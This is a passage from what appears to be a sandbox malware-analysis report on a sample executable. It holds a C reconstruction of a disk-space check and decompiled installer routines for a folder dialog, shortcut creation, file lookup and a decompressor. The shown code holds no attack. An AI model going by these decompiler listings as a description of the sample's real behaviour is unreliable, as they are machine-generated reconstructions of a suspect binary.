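typedef struct {
    uint32_t lo;   /* _v48 in the listing: low dword of free KiB  */
    int32_t  hi;   /* _v44 in the listing: high dword, signed     */
} free_kib_t;

/* Stand-in for kernel32 MulDiv: 64-bit intermediate product, rounds to
 * nearest (half away from zero), returns -1 when the quotient does not fit
 * a 32-bit int or the denominator is zero. */
static int32_t mul_div(int32_t number, int32_t numerator, int32_t denominator)
{
    int64_t  prod;
    uint64_t p, d, q;
    int      negative;

    if (denominator == 0)
        return -1;
    prod = (int64_t)number * numerator;                 /* 32x32 -> 64 */
    negative = (prod < 0) != (denominator < 0);
    p = (uint64_t)(prod < 0 ? -prod : prod);
    d = (uint64_t)(denominator < 0 ? -(int64_t)denominator : denominator);
    q = (p + d / 2) / d;
    if (q > (uint64_t)INT32_MAX + (negative ? 1u : 0u))
        return -1;                                      /* overflow, as MulDiv */
    return negative ? (int32_t)-(int64_t)q : (int32_t)q;
}

/* Fallback branch: bytes per cluster * free clusters / 1024 in 32 bits,
 * then the high dword is the sign extension (cdq). A MulDiv overflow
 * therefore leaves -1 in both dwords. */
static free_kib_t free_kib_legacy(uint32_t sectors_per_cluster,
                                  uint32_t bytes_per_sector,
                                  uint32_t free_clusters)
{
    free_kib_t r;
    int32_t kib = mul_div((int32_t)(sectors_per_cluster * bytes_per_sector),
                          (int32_t)free_clusters, 0x400);
    r.lo = (uint32_t)kib;
    r.hi = kib < 0 ? -1 : 0;
    return r;
}

/* 64-bit branch: the listing shifts the 64-bit byte count right by 10
 * ((hi << 32 | lo) >> 10 and hi >> 10) and keeps both halves. */
static free_kib_t free_kib_ex(uint64_t free_bytes)
{
    free_kib_t r;
    uint64_t kib = free_bytes >> 10;
    r.lo = (uint32_t)kib;
    r.hi = (int32_t)(kib >> 32);
    return r;
}

/* The test "_t197 <= 0 && (_t197 < 0 || _v48 < _t95)": not enough room when
 * the high dword is negative, or it is zero and the low dword is below the
 * required figure; a positive high dword always passes. The signedness of
 * the low-dword compare is not visible in the listing; unsigned is assumed. */
static int insufficient_space(free_kib_t f, uint32_t required_kib)
{
    return f.hi <= 0 && (f.hi < 0 || f.lo < required_kib);
}

int main(void)
{
    /* constructed inputs: a small volume and a 4 TiB volume seen both ways */
    free_kib_t small       = free_kib_legacy(8, 512, 100000);    /* 400000 KiB */
    free_kib_t huge_legacy = free_kib_legacy(8, 512, 1u << 30);  /* 2^42 bytes */
    free_kib_t huge_ex     = free_kib_ex((uint64_t)1 << 42);     /* same volume */

    printf("small: hi=%d lo=%u need 300000 -> %d, need 500000 -> %d\n",
           small.hi, small.lo, insufficient_space(small, 300000),
           insufficient_space(small, 500000));
    printf("4 TiB via MulDiv: hi=%d lo=%u need 1 -> %d (overflow reads as no space)\n",
           huge_legacy.hi, huge_legacy.lo, insufficient_space(huge_legacy, 1));
    printf("4 TiB via 64-bit: hi=%d lo=%u need 1 -> %d\n",
           huge_ex.hi, huge_ex.lo, insufficient_space(huge_ex, 1));
    return 0;
}
```

The point of the second and third cases is the failure mode that the two-branch design avoids: once free space reaches 2 TiB the 32-bit MulDiv result no longer fits, the call returns -1, cdq turns that into a negative high dword, and the dialog would report too little space on a nearly empty disk. With the 64-bit branch the same volume yields hi = 1 and passes the check regardless of the low dword.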
                Instruction address column for the listing above (one address per decompiled line, spilled out of the side-by-side layout): 0x00404496 to 0x004047e4

                APIs
                • GetDlgItem.USER32 ref: 004044E5
                • SetWindowTextA.USER32(00000000,?), ref: 0040450F
                • SHBrowseForFolderA.SHELL32(?,00429C48,?), ref: 004045C0
                • CoTaskMemFree.OLE32(00000000), ref: 004045CB
                • lstrcmpiA.KERNEL32(0042E3A0,0042A870,00000000,?,?), ref: 004045FD
                • lstrcatA.KERNEL32(?,0042E3A0), ref: 00404609
                • SetDlgItemTextA.USER32 ref: 0040461B
                  • Part of subcall function 00405665: GetDlgItemTextA.USER32 ref: 00405678
                  • Part of subcall function 004061CF: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Ptmhbplhxb.exe",772EFA90,C:\Users\user~1\AppData\Local\Temp\,00000000,004031CC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00406227
                  • Part of subcall function 004061CF: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406234
                  • Part of subcall function 004061CF: CharNextA.USER32(?,"C:\Users\user\Desktop\Ptmhbplhxb.exe",772EFA90,C:\Users\user~1\AppData\Local\Temp\,00000000,004031CC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00406239
                  • Part of subcall function 004061CF: CharPrevA.USER32(?,?,772EFA90,C:\Users\user~1\AppData\Local\Temp\,00000000,004031CC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00406249
                • GetDiskFreeSpaceA.KERNEL32(00429840,?,?,0000040F,?,00429840,00429840,?,00000001,00429840,?,?,000003FB,?), ref: 004046D9
                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004046F4
                  • Part of subcall function 0040484D: lstrlenA.KERNEL32(0042A870,0042A870,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404768,000000DF,00000000,00000400,?), ref: 004048EB
                  • Part of subcall function 0040484D: wsprintfA.USER32 ref: 004048F3
                  • Part of subcall function 0040484D: SetDlgItemTextA.USER32 ref: 00404906
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                • String ID: A
                • API String ID: 2624150263-3554254475
                • Opcode ID: 20b6d9ced992337b1412f46738ab000ca340b2c21d94be4f2955b414de4e2f25
                • Instruction ID: e7c3eafb31c7d15e6a6da749512948d226074c80576101813d8e7fa34d4e7a23
                • Opcode Fuzzy Hash: 20b6d9ced992337b1412f46738ab000ca340b2c21d94be4f2955b414de4e2f25
                • Instruction Fuzzy Hash: 44A190B1900209ABDB11AFA6CD45AAFB7B8EF85314F14843BF605B72D1D77C89418B2D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 74%
                			E004020CB() {
                				signed int _t55;
                				void* _t59;
                				intOrPtr* _t63;
                				intOrPtr _t64;
                				intOrPtr* _t65;
                				intOrPtr* _t67;
                				intOrPtr* _t69;
                				intOrPtr* _t71;
                				intOrPtr* _t73;
                				intOrPtr* _t75;
                				intOrPtr* _t78;
                				intOrPtr* _t80;
                				intOrPtr* _t82;
                				intOrPtr* _t84;
                				int _t87;
                				intOrPtr* _t95;
                				signed int _t105;
                				signed int _t109;
                				void* _t111;
                
                				 *(_t111 - 0x3c) = E00402AC1(0xfffffff0);
                				 *(_t111 - 0xc) = E00402AC1(0xffffffdf);
                				 *((intOrPtr*)(_t111 - 0x80)) = E00402AC1(2);
                				 *((intOrPtr*)(_t111 - 0x7c)) = E00402AC1(0xffffffcd);
                				 *((intOrPtr*)(_t111 - 0x34)) = E00402AC1(0x45);
                				_t55 =  *(_t111 - 0x18);
                				 *(_t111 - 0x88) = _t55 & 0x00000fff;
                				_t105 = _t55 & 0x00008000;
                				_t109 = _t55 >> 0x0000000c & 0x00000007;
                				 *(_t111 - 0x78) = _t55 >> 0x00000010 & 0x0000ffff;
                				if(E0040596A( *(_t111 - 0xc)) == 0) {
                					E00402AC1(0x21);
                				}
                				_t59 = _t111 + 8;
                				__imp__CoCreateInstance(0x408514, _t87, 1, 0x408504, _t59);
                				if(_t59 < _t87) {
                					L15:
                					 *((intOrPtr*)(_t111 - 4)) = 1;
                					_push(0xfffffff0);
                				} else {
                					_t63 =  *((intOrPtr*)(_t111 + 8));
                					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408524, _t111 - 0x30);
                					 *((intOrPtr*)(_t111 - 8)) = _t64;
                					if(_t64 >= _t87) {
                						_t67 =  *((intOrPtr*)(_t111 + 8));
                						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
                						if(_t105 == _t87) {
                							_t84 =  *((intOrPtr*)(_t111 + 8));
                							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp\\nsq9535.tmp");
                						}
                						if(_t109 != _t87) {
                							_t82 =  *((intOrPtr*)(_t111 + 8));
                							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
                						}
                						_t69 =  *((intOrPtr*)(_t111 + 8));
                						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x78));
                						_t95 =  *((intOrPtr*)(_t111 - 0x7c));
                						if( *_t95 != _t87) {
                							_t80 =  *((intOrPtr*)(_t111 + 8));
                							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x88));
                						}
                						_t71 =  *((intOrPtr*)(_t111 + 8));
                						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x80)));
                						_t73 =  *((intOrPtr*)(_t111 + 8));
                						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x34)));
                						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
                							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x3c), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
                								_t78 =  *((intOrPtr*)(_t111 - 0x30));
                								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
                							}
                						}
                						_t75 =  *((intOrPtr*)(_t111 - 0x30));
                						 *((intOrPtr*)( *_t75 + 8))(_t75);
                					}
                					_t65 =  *((intOrPtr*)(_t111 + 8));
                					 *((intOrPtr*)( *_t65 + 8))(_t65);
                					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                						_push(0xfffffff4);
                					} else {
                						goto L15;
                					}
                				}
                				E00401423();
                				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t111 - 4));
                				return 0;
                			}

                0x004020d4
                0x004020de
                0x004020e8
                0x004020f2
                0x004020fd
                0x00402100
                0x0040211a
                0x00402120
                0x00402126
                0x00402129
                0x00402133
                0x00402137
                0x00402137
                0x0040213c
                0x0040214d
                0x00402155
                0x0040222e
                0x0040222e
                0x00402235
                0x0040215b
                0x0040215b
                0x0040216a
                0x0040216e
                0x00402171
                0x00402177
                0x00402185
                0x00402188
                0x0040218a
                0x00402195
                0x00402195
                0x0040219a
                0x0040219c
                0x004021a3
                0x004021a3
                0x004021a6
                0x004021af
                0x004021b2
                0x004021b7
                0x004021b9
                0x004021c6
                0x004021c6
                0x004021c9
                0x004021d2
                0x004021d5
                0x004021de
                0x004021e4
                0x004021eb
                0x00402204
                0x00402206
                0x00402214
                0x00402214
                0x00402204
                0x00402217
                0x0040221d
                0x0040221d
                0x00402220
                0x00402226
                0x0040222c
                0x00402241
                0x00000000
                0x00000000
                0x00000000
                0x0040222c
                0x00402237
                0x00402954
                0x00402960

                APIs
                • CoCreateInstance.OLE32(00408514,?,00000001,00408504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040214D
                • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021FC
                Strings
                • C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp, xrefs: 0040218D
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: ByteCharCreateInstanceMultiWide
                • String ID: C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp
                • API String ID: 123533781-1390092544
                • Opcode ID: 3ab9ca111cfd16ea316d8908730db186f13cf70328ad1dfde5033f2efd3f2ba1
                • Instruction ID: 70e90dd273e36d6cf470b0c6c9ff695bb876e65ea6d8ae05c01ad1deac9bcbee
                • Opcode Fuzzy Hash: 3ab9ca111cfd16ea316d8908730db186f13cf70328ad1dfde5033f2efd3f2ba1
                • Instruction Fuzzy Hash: D9512775A00208BFCF10DFE4C988A9DBBB5EF48318F2045AAF915EB2D1DA799941CF14
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 39%
                			E004026F8(char __ebx, char* __edi, char* __esi) {
                				void* _t19;
                
                				if(FindFirstFileA(E00402AC1(2), _t19 - 0x1c8) != 0xffffffff) {
                					E00405EC3(__edi, _t6);
                					_push(_t19 - 0x19c);
                					_push(__esi);
                					E00405F65();
                				} else {
                					 *__edi = __ebx;
                					 *__esi = __ebx;
                					 *((intOrPtr*)(_t19 - 4)) = 1;
                				}
                				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t19 - 4));
                				return 0;
                			}

                0x00402710
                0x00402724
                0x0040272f
                0x00402730
                0x0040286f
                0x00402712
                0x00402712
                0x00402714
                0x00402716
                0x00402716
                0x00402954
                0x00402960

                APIs
                • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402707
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: FileFindFirst
                • String ID:
                • API String ID: 1974802433-0
                • Opcode ID: 35474e701519af4a3bfe5b21ab3a1074e282d3bfb0b95cafabb6a5a8f21aa47d
                • Instruction ID: 5589ad20af1132df25b1d4da55578e461c11660e8300270abb34f4e41d1b37c2
                • Opcode Fuzzy Hash: 35474e701519af4a3bfe5b21ab3a1074e282d3bfb0b95cafabb6a5a8f21aa47d
                • Instruction Fuzzy Hash: 8BF0A0726041119AD710E7B49999EEEB778DB21324F60057BE685F20C1C6B88A469B2A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 79%
                			E00406742(signed int __ebx, signed int* __esi) {
                				signed int _t396;
                				signed int _t425;
                				signed int _t442;
                				signed int _t443;
                				signed int* _t446;
                				void* _t448;
                
                				L0:
                				while(1) {
                					L0:
                					_t446 = __esi;
                					_t425 = __ebx;
                					if( *(_t448 - 0x34) == 0) {
                						break;
                					}
                					L55:
                					__eax =  *(__ebp - 0x38);
                					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                					__ecx = __ebx;
                					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                					__ebx = __ebx + 8;
                					while(1) {
                						L56:
                						if(__ebx < 0xe) {
                							goto L0;
                						}
                						L57:
                						__eax =  *(__ebp - 0x40);
                						__eax =  *(__ebp - 0x40) & 0x00003fff;
                						__ecx = __eax;
                						__esi[1] = __eax;
                						__ecx = __eax & 0x0000001f;
                						if(__cl > 0x1d) {
                							L9:
                							_t443 = _t442 | 0xffffffff;
                							 *_t446 = 0x11;
                							L10:
                							_t446[0x147] =  *(_t448 - 0x40);
                							_t446[0x146] = _t425;
                							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                							L11:
                							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                							_t446[0x26ea] =  *(_t448 - 0x30);
                							E00406EB1( *(_t448 + 8));
                							return _t443;
                						}
                						L58:
                						__eax = __eax & 0x000003e0;
                						if(__eax > 0x3a0) {
                							goto L9;
                						}
                						L59:
                						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                						__ebx = __ebx - 0xe;
                						_t94 =  &(__esi[2]);
                						 *_t94 = __esi[2] & 0x00000000;
                						 *__esi = 0xc;
                						while(1) {
                							L60:
                							__esi[1] = __esi[1] >> 0xa;
                							__eax = (__esi[1] >> 0xa) + 4;
                							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                								goto L68;
                							}
                							L61:
                							while(1) {
                								L64:
                								if(__ebx >= 3) {
                									break;
                								}
                								L62:
                								if( *(__ebp - 0x34) == 0) {
                									goto L182;
                								}
                								L63:
                								__eax =  *(__ebp - 0x38);
                								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                								__ecx = __ebx;
                								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                								__ebx = __ebx + 8;
                							}
                							L65:
                							__ecx = __esi[2];
                							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                							__ebx = __ebx - 3;
                							_t108 = __ecx + 0x4083f8; // 0x121110
                							__ecx =  *_t108;
                							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                							__ecx = __esi[1];
                							__esi[2] = __esi[2] + 1;
                							__eax = __esi[2];
                							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                								goto L64;
                							}
                							L66:
                							while(1) {
                								L68:
                								if(__esi[2] >= 0x13) {
                									break;
                								}
                								L67:
                								_t119 = __esi[2] + 0x4083f8; // 0x4000300
                								__eax =  *_t119;
                								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                								_t126 =  &(__esi[2]);
                								 *_t126 = __esi[2] + 1;
                							}
                							L69:
                							__ecx = __ebp - 8;
                							__edi =  &(__esi[0x143]);
                							 &(__esi[0x148]) =  &(__esi[0x144]);
                							__eax = 0;
                							 *(__ebp - 8) = 0;
                							__eax =  &(__esi[3]);
                							 *__edi = 7;
                							__eax = E00406F19( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                							if(__eax != 0) {
                								L72:
                								 *__esi = 0x11;
                								while(1) {
                									L180:
                									_t396 =  *_t446;
                									if(_t396 > 0xf) {
                										break;
                									}
                									L1:
                									switch( *((intOrPtr*)(_t396 * 4 +  &M00406E71))) {
                										case 0:
                											L101:
                											__eax = __esi[4] & 0x000000ff;
                											__esi[3] = __esi[4] & 0x000000ff;
                											__eax = __esi[5];
                											__esi[2] = __esi[5];
                											 *__esi = 1;
                											goto L102;
                										case 1:
                											L102:
                											__eax = __esi[3];
                											while(1) {
                												L105:
                												__eflags = __ebx - __eax;
                												if(__ebx >= __eax) {
                													break;
                												}
                												L103:
                												__eflags =  *(__ebp - 0x34);
                												if( *(__ebp - 0x34) == 0) {
                													goto L182;
                												}
                												L104:
                												__ecx =  *(__ebp - 0x38);
                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                												__ecx = __ebx;
                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                												__ebx = __ebx + 8;
                												__eflags = __ebx;
                											}
                											L106:
                											__eax =  *(0x40a3e8 + __eax * 2) & 0x0000ffff;
                											__eax = __eax &  *(__ebp - 0x40);
                											__ecx = __esi[2];
                											__eax = __esi[2] + __eax * 4;
                											__ecx =  *(__eax + 1) & 0x000000ff;
                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                											__ecx =  *__eax & 0x000000ff;
                											__eflags = __ecx;
                											if(__ecx != 0) {
                												L108:
                												__eflags = __cl & 0x00000010;
                												if((__cl & 0x00000010) == 0) {
                													L110:
                													__eflags = __cl & 0x00000040;
                													if((__cl & 0x00000040) == 0) {
                														goto L125;
                													}
                													L111:
                													__eflags = __cl & 0x00000020;
                													if((__cl & 0x00000020) == 0) {
                														goto L9;
                													}
                													L112:
                													 *__esi = 7;
                													goto L180;
                												}
                												L109:
                												__esi[2] = __ecx;
                												__esi[1] = __eax;
                												 *__esi = 2;
                												goto L180;
                											}
                											L107:
                											__esi[2] = __eax;
                											 *__esi = 6;
                											goto L180;
                										case 2:
                											L113:
                											__eax = __esi[2];
                											while(1) {
                												L116:
                												__eflags = __ebx - __eax;
                												if(__ebx >= __eax) {
                													break;
                												}
                												L114:
                												__eflags =  *(__ebp - 0x34);
                												if( *(__ebp - 0x34) == 0) {
                													goto L182;
                												}
                												L115:
                												__ecx =  *(__ebp - 0x38);
                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                												__ecx = __ebx;
                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                												__ebx = __ebx + 8;
                												__eflags = __ebx;
                											}
                											L117:
                											 *(0x40a3e8 + __eax * 2) & 0x0000ffff =  *(0x40a3e8 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                											__esi[1] = __esi[1] + ( *(0x40a3e8 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                											__ecx = __eax;
                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                											__ebx = __ebx - __eax;
                											__eflags = __ebx;
                											__eax = __esi[4] & 0x000000ff;
                											__esi[3] = __esi[4] & 0x000000ff;
                											__eax = __esi[6];
                											__esi[2] = __esi[6];
                											 *__esi = 3;
                											goto L118;
                										case 3:
                											L118:
                											__eax = __esi[3];
                											while(1) {
                												L121:
                												__eflags = __ebx - __eax;
                												if(__ebx >= __eax) {
                													break;
                												}
                												L119:
                												__eflags =  *(__ebp - 0x34);
                												if( *(__ebp - 0x34) == 0) {
                													goto L182;
                												}
                												L120:
                												__ecx =  *(__ebp - 0x38);
                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                												__ecx = __ebx;
                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                												__ebx = __ebx + 8;
                												__eflags = __ebx;
                											}
                											L122:
                											__eax =  *(0x40a3e8 + __eax * 2) & 0x0000ffff;
                											__eax = __eax &  *(__ebp - 0x40);
                											__ecx = __esi[2];
                											__eax = __esi[2] + __eax * 4;
                											__ecx =  *(__eax + 1) & 0x000000ff;
                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                											__ecx =  *__eax & 0x000000ff;
                											__eflags = __cl & 0x00000010;
                											if((__cl & 0x00000010) == 0) {
                												L124:
                												__eflags = __cl & 0x00000040;
                												if((__cl & 0x00000040) != 0) {
                													goto L9;
                												}
                												L125:
                												__esi[3] = __ecx;
                												__ecx =  *(__eax + 2) & 0x0000ffff;
                												__esi[2] = __eax;
                												goto L180;
                											}
                											L123:
                											__esi[2] = __ecx;
                											__esi[3] = __eax;
                											 *__esi = 4;
                											goto L180;
                										case 4:
                											L126:
                											__eax = __esi[2];
                											while(1) {
                												L129:
                												__eflags = __ebx - __eax;
                												if(__ebx >= __eax) {
                													break;
                												}
                												L127:
                												__eflags =  *(__ebp - 0x34);
                												if( *(__ebp - 0x34) == 0) {
                													goto L182;
                												}
                												L128:
                												__ecx =  *(__ebp - 0x38);
                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                												__ecx = __ebx;
                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                												__ebx = __ebx + 8;
                												__eflags = __ebx;
                											}
                											L130:
                											 *(0x40a3e8 + __eax * 2) & 0x0000ffff =  *(0x40a3e8 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                											__esi[3] = __esi[3] + ( *(0x40a3e8 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                											__ecx = __eax;
                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                											__ebx = __ebx - __eax;
                											__eflags = __ebx;
                											 *__esi = 5;
                											goto L131;
                										case 5:
                											L131:
                											__eax =  *(__ebp - 0x30);
                											__edx = __esi[3];
                											__eax = __eax - __esi;
                											__ecx = __eax - __esi - 0x1ba0;
                											__eflags = __eax - __esi - 0x1ba0 - __edx;
                											if(__eax - __esi - 0x1ba0 >= __edx) {
                												__ecx = __eax;
                												__ecx = __eax - __edx;
                												__eflags = __ecx;
                											} else {
                												__esi[0x26e8] = __esi[0x26e8] - __edx;
                												__ecx = __esi[0x26e8] - __edx - __esi;
                												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
                											}
                											__eflags = __esi[1];
                											 *(__ebp - 0x20) = __ecx;
                											if(__esi[1] != 0) {
                												L135:
                												__edi =  *(__ebp - 0x2c);
                												do {
                													L136:
                													__eflags = __edi;
                													if(__edi != 0) {
                														goto L152;
                													}
                													L137:
                													__edi = __esi[0x26e8];
                													__eflags = __eax - __edi;
                													if(__eax != __edi) {
                														L143:
                														__esi[0x26ea] = __eax;
                														__eax = E00406EB1( *((intOrPtr*)(__ebp + 8)));
                														__eax = __esi[0x26ea];
                														__ecx = __esi[0x26e9];
                														__eflags = __eax - __ecx;
                														 *(__ebp - 0x30) = __eax;
                														if(__eax >= __ecx) {
                															__edi = __esi[0x26e8];
                															__edi = __esi[0x26e8] - __eax;
                															__eflags = __edi;
                														} else {
                															__ecx = __ecx - __eax;
                															__edi = __ecx - __eax - 1;
                														}
                														__edx = __esi[0x26e8];
                														__eflags = __eax - __edx;
                														 *(__ebp - 8) = __edx;
                														if(__eax == __edx) {
                															__edx =  &(__esi[0x6e8]);
                															__eflags = __ecx - __edx;
                															if(__ecx != __edx) {
                																__eax = __edx;
                																__eflags = __eax - __ecx;
                																 *(__ebp - 0x30) = __eax;
                																if(__eax >= __ecx) {
                																	__edi =  *(__ebp - 8);
                																	__edi =  *(__ebp - 8) - __eax;
                																	__eflags = __edi;
                																} else {
                																	__ecx = __ecx - __eax;
                																	__edi = __ecx;
                																}
                															}
                														}
                														__eflags = __edi;
                														if(__edi == 0) {
                															goto L183;
                														} else {
                															goto L152;
                														}
                													}
                													L138:
                													__ecx = __esi[0x26e9];
                													__edx =  &(__esi[0x6e8]);
                													__eflags = __ecx - __edx;
                													if(__ecx == __edx) {
                														goto L143;
                													}
                													L139:
                													__eax = __edx;
